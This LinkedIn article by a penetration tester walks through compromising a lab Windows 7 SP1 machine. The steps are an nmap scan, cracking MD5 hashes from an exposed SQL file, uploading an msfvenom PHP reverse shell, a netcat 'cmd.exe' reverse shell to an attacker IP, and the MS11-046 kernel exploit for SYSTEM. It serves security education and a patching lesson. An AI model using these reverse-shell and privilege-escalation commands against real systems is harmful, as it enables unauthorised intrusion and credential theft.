Hacking Windows 7 Sp1 systems

https://www.linkedin.com/pulse/example-hacking-windows-7-sp1-owning-system-gerhard-mohr

What happens when you don’t keep your system up to date.

Example of Hacking Windows 7 SP1 and owning System

Status is onlineGerhard MohrPenetration Tester | Ethical Hacker | Red Team – Sphere Cyber Security Unit18 articles

First we start with an NMAP SCAN

root@kali:~# nmap -sV -sC 1.1.1.1 –top-ports 100 –reason –open

Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-25 17:17 MDT

Nmap scan report for 1.1.1.1

Host is up, received arp-response (0.18s latency).

Not shown: 87 filtered ports

Reason: 87 no-responses

Some closed ports may be reported as filtered due to –defeat-rst-ratelimit

PORT   STATE SERVICE   REASON     VERSION

135/tcp  open msrpc    syn-ack ttl 128 Microsoft Windows RPC

139/tcp  open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn

445/tcp  open microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

554/tcp  open rtsp?    syn-ack ttl 128

3306/tcp open mysql    syn-ack ttl 128 MySQL (unauthorized; French)

5357/tcp open http     syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Service Unavailable

5800/tcp open vnc-http   syn-ack ttl 128 TightVNC (user: gamma; VNC TCP port: 5900)

|_http-title: TightVNC desktop [gamma]

5900/tcp open vnc     syn-ack ttl 128 VNC (protocol 3.8)

| vnc-info: 

|  Protocol version: 3.8

|  Security types: 

|   VNC Authentication (2)

|   Tight (16)

|  Tight auth subtypes: 

|_  STDV VNCAUTH_ (2)

8080/tcp open http     syn-ack ttl 128 Apache httpd 2.4.9 ((Win32) PHP/5.5.12)

|_http-open-proxy: Proxy might be redirecting requests

| http-robots.txt: 1 disallowed entry 

|_/testmysql.php

|_http-server-header: Apache/2.4.9 (Win32) PHP/5.5.12

|_http-title: Site doesn’t have a title (text/html).

49152/tcp open msrpc    syn-ack ttl 128 Microsoft Windows RPC

49153/tcp open msrpc    syn-ack ttl 128 Microsoft Windows RPC

49154/tcp open msrpc    syn-ack ttl 128 Microsoft Windows RPC

49155/tcp open msrpc    syn-ack ttl 128 Microsoft Windows RPC

MAC Address: 00:50:56:B8:4A:94 (VMware)

Service Info: Host: LAB1; OS: Windows; CPE: cpe:/o:microsoft:window

We then perform a directory brute force on port 8080 as per the info above in the nmap scan

We found the following: http://1.1.1.1:8080/php/install

downloaded the babinstall.sql

Searched for users in the db install file

found user admin@admin.bab and some Password hashes : (dont try and crack these I changed them for this article)

200cab26807d6bf99fd6f4f0d1ca54d4

22995d8a5ed1b91445f6c55ac121505b

0da8f2a37b9e7966e08196a6bd1baa29

We identified the above password hashes as MD5 hashes.

we proceed to crack them using hashcat and we found the passwords in plain text:

  1. 200cab26807d6bf99fd6f4f0d1ca54d4 = administrator
  2. 22995d8a5ed1b91445f6c55ac121505b = 012345678

We can now try to login to the admin panel of the web application using the admin@admin.bab and password 012345678

and we are logged into the admin panel as administrator.

No alt text provided for this image

Looking around the application I noticed that we cannot upload any files . I then proceeded to find where to change the configuration for this and found it via the “site” page. I configured the correct parameters in order to allow me to upload a reverse shell. We need to keep in mind I am going to want to upload a *.php shell as nmap confirmed that php is what is running on the system . You can also confirm from the above the page ends in index.php

Since this is a windows system most of the php_reverse_shells are build for Linux systems so I will have to make my own windows php reverse shell. This is achieved running the following command in my attacking system:

msfvenom -p php/reverse_php LHOST=1.1.1.2 LPORT=443 -f raw > /var/www/html/WindowsPHPShells/myshellwin.php

I proceed to upload the shell to the uploads directory and then execute the shell at that directory by visiting the web directory. http://1.1.1.1:8080/php/123/fileManager/users/U1/Testing/myshellwin.php before doing so we need to create a listener on our attacking machine to catch the reverse connection.

creating the listener; nc -nlvp 443

We get the shell back to our attacking system . But wait its not a fully interactive shell and after a few minutes my shell dies /disconnects.

I proceed to upload nc.exe to the windows machine using the same method used when I uploaded the shell. Thinking that if I can hold a non interactive shell for at least one minute I can setup another reverse listener on our attacking system and execute a second reverse shell on the windows system to achieve the fully interactive shell.

On the windows system I got again my non interactive shell and quickly executed nc -nvv 1.1.1.2 4444 -e cmd.exe and on my attacking system I ran the command to start a second listener nc -nlvp 4444

And it worked !!! I have full shell with full functionality. I have hacked into this windows machine.

No alt text provided for this image

This is not where is stops, why ? we want to own the system and retrieve passwords from the system. If we are NT/Authority user we own and control this windows 7 machine.

User Privilege Escalation

First we look at systeminfo

OS Name:          Microsoft Windows 7 Professional 

OS Version:        6.1.7601 Service Pack 1 Build 7601

Hotfixes are the latest patches and security updates installed

——- Patches (also listed as part of systeminfo) ——-

Caption                   Description   HotFixID  InstalledOn  

http://support.microsoft.com/?kbid=2534111 Hotfix      KB2534111 12/31/2014  

http://support.microsoft.com/?kbid=3045171 Security Update KB3045171 5/11/2016   

http://support.microsoft.com/?kbid=3124280 Security Update KB3124280 3/31/2017   

http://support.microsoft.com/?kbid=4012212 Security Update KB4012212 2/8/2018   

http://support.microsoft.com/?kbid=976902  Update      KB976902  11/20/2010 

In order to not make this article a long one I am skipping straight to the juicy stuff. Normally there is allot more being checked. Like what access users have to write to which files. Another check is to see if the folders are properly quoted , example “C:\Program Files\Program Name\” if its not properly quoted it means that an attacker can use this to escalate privileges to system because of the way Windows finds programs. Too explain this Windows will start as follows

C:

C:\Program

C:\Program Files\

C:\Program Files\Program and so on and so on. So basically all you need to do is place your malicious executable in the beginning of the program folder so that windows system executes this and boom you escalated your privileges. This however was not the case in this scenario and had to look at a kernel exploit.

Google foo for the the the OS version and service pack I found an exploit MS11-046 which describes a vulnerability in the windows Ancillary Function Driver. The Ancillary Function Driver for Winsock service is a kernel driver. If the Ancillary Function Driver for Winsock is stopped, the following services will not start and initialize ( DHCP Client and TCP/IP Netbois Helper ) it was fixed and patched in patch KB2503665.

I looked at Patches installed and verified that this patch was indeed not installed. So now we have a very strong possibility that we can escalate our users privileges to system authority. So lets try it.

I downloaded the exploit and compiled it since it was written in c. I ran the following command i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

I then uploaded the compiled exploit and ran the exploit as MS11-046.exe and there we have it the system is fully compromised and I am running as System/Authority.

No alt text provided for this image

Our next step is dumping windows credentials the reason we do this is because users normally use the same credentials on all systems which will make this process easier to pwn another system. We can dump network traffic and see if we can find any passwords being transmitted in clear text. If this machine is connected to a network and domain and we could retrieve domain admin credentials we could totally take over the whole network as the administrator password will be used on all systems.

Now you can see how important it is to keep your systems patched and updated. A compromise like this can destroy your business.

Hope you enjoyed this article.

Gerhard De Villiers-Mohr ( Ethical Hacker and Senior Penetration Tester )Report this

Published by

Status is onlineGerhard MohrPenetration Tester | Ethical Hacker | Red Team – Sphere Cyber Security UnitPublished • 3h18 articlesFollowhashtag#Hackinghashtag#Windows 7 hashtag#Penetration Testing How to compromise a windows 7 machine Sp1 not fully patched.

Leave a reply